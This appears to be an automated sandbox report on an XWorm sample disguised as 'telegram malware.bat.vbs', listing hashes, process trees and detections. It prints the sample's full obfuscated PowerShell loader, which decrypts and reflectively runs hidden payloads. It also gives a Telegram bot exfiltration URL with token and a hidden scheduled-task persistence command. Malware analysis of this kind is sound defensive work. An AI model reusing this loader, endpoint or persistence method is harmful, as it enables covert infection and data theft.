Analysis
-
max time kernel
297s -
max time network
299s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25-09-2024 13:31
Static task
static1
General
-
Target
telegram malware.bat.vbs
-
Size
47KB
-
MD5
2d4b3f85f3619e096e14096a0849fbf9
-
SHA1
c9aa9a3f00830625ff3f806d0b0d6a22ac3a7d93
-
SHA256
49a7db4ab12330edff1ef80c5e0c9c93d69c4fe36e4ae25eb92d311be55baf66
-
SHA512
42f220a2dee917c3c14164a4fe2399e196218fcea7bc5d56afee6c08ac0bf88b765a9e5bda1cff5f17d59d85800575ceba26819116ca33829a27abed2b53c4aa
-
SSDEEP
768:0yWnyN9IbUZIYiztjyHg6QihA1WmmaMj17Hln1nVrV:0E9XqYwtWAb1DmdxLln5
Malware Config
Extracted
xworm
5.0
Extracted
gurcu
https://api.telegram.org/bot7533145045:AAGnW8Bkr0_G1f_ZxiKTve5hlRZjphTc0aM/sendMessage?chat_id=-4512836800
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4432-62-0x0000021D334F0000-0x0000021D334FE000-memory.dmp family_xworm -
Blocklisted process makes network request 4 IoCs
flow pid Process 48 4432 powershell.exe 53 4432 powershell.exe 60 2948 powershell.exe 61 2948 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2024 powershell.exe 4576 powershell.exe 1900 powershell.exe 3524 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings taskmgr.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 344 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4432 powershell.exe 4952 taskmgr.exe 4952 taskmgr.exe 4432 powershell.exe 2024 powershell.exe 2024 powershell.exe 4952 taskmgr.exe 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe 4952 taskmgr.exe 4952 taskmgr.exe 4576 powershell.exe 4576 powershell.exe 4576 powershell.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4952 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4952 taskmgr.exe Token: SeSystemProfilePrivilege 4952 taskmgr.exe Token: SeCreateGlobalPrivilege 4952 taskmgr.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeIncreaseQuotaPrivilege 3864 powershell.exe Token: SeSecurityPrivilege 3864 powershell.exe Token: SeTakeOwnershipPrivilege 3864 powershell.exe Token: SeLoadDriverPrivilege 3864 powershell.exe Token: SeSystemProfilePrivilege 3864 powershell.exe Token: SeSystemtimePrivilege 3864 powershell.exe Token: SeProfSingleProcessPrivilege 3864 powershell.exe Token: SeIncBasePriorityPrivilege 3864 powershell.exe Token: SeCreatePagefilePrivilege 3864 powershell.exe Token: SeBackupPrivilege 3864 powershell.exe Token: SeRestorePrivilege 3864 powershell.exe Token: SeShutdownPrivilege 3864 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeSystemEnvironmentPrivilege 3864 powershell.exe Token: SeRemoteShutdownPrivilege 3864 powershell.exe Token: SeUndockPrivilege 3864 powershell.exe Token: SeManageVolumePrivilege 3864 powershell.exe Token: 33 3864 powershell.exe Token: 34 3864 powershell.exe Token: 35 3864 powershell.exe Token: 36 3864 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeIncreaseQuotaPrivilege 4576 powershell.exe Token: SeSecurityPrivilege 4576 powershell.exe Token: SeTakeOwnershipPrivilege 4576 powershell.exe Token: SeLoadDriverPrivilege 4576 powershell.exe Token: SeSystemProfilePrivilege 4576 powershell.exe Token: SeSystemtimePrivilege 4576 powershell.exe Token: SeProfSingleProcessPrivilege 4576 powershell.exe Token: SeIncBasePriorityPrivilege 4576 powershell.exe Token: SeCreatePagefilePrivilege 4576 powershell.exe Token: SeBackupPrivilege 4576 powershell.exe Token: SeRestorePrivilege 4576 powershell.exe Token: SeShutdownPrivilege 4576 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeSystemEnvironmentPrivilege 4576 powershell.exe Token: SeRemoteShutdownPrivilege 4576 powershell.exe Token: SeUndockPrivilege 4576 powershell.exe Token: SeManageVolumePrivilege 4576 powershell.exe Token: 33 4576 powershell.exe Token: 34 4576 powershell.exe Token: 35 4576 powershell.exe Token: 36 4576 powershell.exe Token: SeIncreaseQuotaPrivilege 4576 powershell.exe Token: SeSecurityPrivilege 4576 powershell.exe Token: SeTakeOwnershipPrivilege 4576 powershell.exe Token: SeLoadDriverPrivilege 4576 powershell.exe Token: SeSystemProfilePrivilege 4576 powershell.exe Token: SeSystemtimePrivilege 4576 powershell.exe Token: SeProfSingleProcessPrivilege 4576 powershell.exe Token: SeIncBasePriorityPrivilege 4576 powershell.exe Token: SeCreatePagefilePrivilege 4576 powershell.exe Token: SeBackupPrivilege 4576 powershell.exe Token: SeRestorePrivilege 4576 powershell.exe Token: SeShutdownPrivilege 4576 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeSystemEnvironmentPrivilege 4576 powershell.exe Token: SeRemoteShutdownPrivilege 4576 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe 4952 taskmgr.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3740 wrote to memory of 4208 3740 cmd.exe 98 PID 3740 wrote to memory of 4208 3740 cmd.exe 98 PID 3740 wrote to memory of 4432 3740 cmd.exe 99 PID 3740 wrote to memory of 4432 3740 cmd.exe 99 PID 4432 wrote to memory of 2024 4432 powershell.exe 100 PID 4432 wrote to memory of 2024 4432 powershell.exe 100 PID 4432 wrote to memory of 3864 4432 powershell.exe 101 PID 4432 wrote to memory of 3864 4432 powershell.exe 101 PID 4432 wrote to memory of 4576 4432 powershell.exe 103 PID 4432 wrote to memory of 4576 4432 powershell.exe 103 PID 2284 wrote to memory of 2760 2284 cmd.exe 108 PID 2284 wrote to memory of 2760 2284 cmd.exe 108 PID 2284 wrote to memory of 2948 2284 cmd.exe 109 PID 2284 wrote to memory of 2948 2284 cmd.exe 109 PID 2948 wrote to memory of 1900 2948 powershell.exe 110 PID 2948 wrote to memory of 1900 2948 powershell.exe 110 PID 2948 wrote to memory of 4988 2948 powershell.exe 111 PID 2948 wrote to memory of 4988 2948 powershell.exe 111 PID 2948 wrote to memory of 3524 2948 powershell.exe 114 PID 2948 wrote to memory of 3524 2948 powershell.exe 114
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\telegram malware.bat.vbs"1⤵PID:1680
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4952
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\telegram malware.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('xkyHsUEz3I6ELu2lR0z7m6Kw05wb28L/CX73bVCU13U='); $aes_var.IV=[System.Convert]::FromBase64String('/jm5YEgLEZRhB2OjwCSNTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$nShDB=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$qhgjI=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$CCizP=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($nShDB, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $CCizP.CopyTo($qhgjI); $CCizP.Dispose(); $nShDB.Dispose(); $qhgjI.Dispose(); $qhgjI.ToArray();}function execute_function($param_var,$param2_var){ IEX '$FvEfJ=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$fCCPt=$FvEfJ.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$fCCPt.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$bqfmX = 'C:\Users\Admin\AppData\Local\Temp\telegram malware.bat';$host.UI.RawUI.WindowTitle = $bqfmX;$ZowMM=[System.IO.File]::ReadAllText($bqfmX).Split([Environment]::NewLine);foreach ($WJela in $ZowMM) { if ($WJela.StartsWith('THuwPURqSTjmbbqbMgKM')) { $jeKym=$WJela.Substring(20); break; }}$payloads_var=[string[]]$jeKym.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\telegram malware')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\SC.cmd1⤵
- Opens file in notepad (likely ransom note)
PID:344
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SC.cmd" "1⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('xkyHsUEz3I6ELu2lR0z7m6Kw05wb28L/CX73bVCU13U='); $aes_var.IV=[System.Convert]::FromBase64String('/jm5YEgLEZRhB2OjwCSNTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$nShDB=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$qhgjI=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$CCizP=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($nShDB, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $CCizP.CopyTo($qhgjI); $CCizP.Dispose(); $nShDB.Dispose(); $qhgjI.Dispose(); $qhgjI.ToArray();}function execute_function($param_var,$param2_var){ IEX '$FvEfJ=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$fCCPt=$FvEfJ.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$fCCPt.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$bqfmX = 'C:\Users\Admin\AppData\Roaming\SC.cmd';$host.UI.RawUI.WindowTitle = $bqfmX;$ZowMM=[System.IO.File]::ReadAllText($bqfmX).Split([Environment]::NewLine);foreach ($WJela in $ZowMM) { if ($WJela.StartsWith('THuwPURqSTjmbbqbMgKM')) { $jeKym=$WJela.Substring(20); break; }}$payloads_var=[string[]]$jeKym.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:2760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
PID:1900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC')3⤵PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:3524
-
-
-
C:\Windows\System32\SppExtComObj.Exe"C:\Windows\System32\SppExtComObj.Exe"1⤵PID:1884
-
C:\Windows\System32\SppExtComObj.Exe"C:\Windows\System32\SppExtComObj.Exe"1⤵PID:560
-
C:\Windows\System32\SppExtComObj.Exe"C:\Windows\System32\SppExtComObj.Exe"1⤵PID:1816
-
C:\Windows\System32\Spectrum.exe"C:\Windows\System32\Spectrum.exe"1⤵PID:4932
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
2KB
MD5e4de99c1795fd54aa87da05fa39c199c
SHA1dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
SHA25623c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
SHA512796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926
-
Filesize
1KB
MD5cc2ce575753731574bf10ff6e5162032
SHA1b660e5156f97af770e5d359fdd2a6ea697f359fb
SHA256c0c37fd6fb26d101e347a1e9b5190029bb591d8c57392dbf2df4741b11fc2dfa
SHA512715bb49c3977d51ff39b0458b99c5e3ba786e3110a4015402cd023b484ff385704475238fb813d074524d76bc733b0d4e92b57b64d187b3d6a664e4f38eebc1b
-
Filesize
1KB
MD597748f71ed95026706014e8524266292
SHA1f60663ea2e2a778c57d07d9678fe04c79c3ff942
SHA256f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f
SHA512b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9
-
Filesize
1KB
MD511b2ddac5f77354fdf267769650c46f4
SHA14b4fb743eefb36191871d8bd3dc374caed41a9db
SHA256b61a60bf71fdae451a7be222d041d153262224d241c0803e0f7bb289013ac134
SHA51272372c52617151d65d97363770b128c8a0180e4713ec98f992c2f802c4781fcd6ab4dc6153b256254870aae63e30d453fb61489c1f2f9f912d5efd1bb97bc2ae
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
47KB
MD52d4b3f85f3619e096e14096a0849fbf9
SHA1c9aa9a3f00830625ff3f806d0b0d6a22ac3a7d93
SHA25649a7db4ab12330edff1ef80c5e0c9c93d69c4fe36e4ae25eb92d311be55baf66
SHA51242f220a2dee917c3c14164a4fe2399e196218fcea7bc5d56afee6c08ac0bf88b765a9e5bda1cff5f17d59d85800575ceba26819116ca33829a27abed2b53c4aa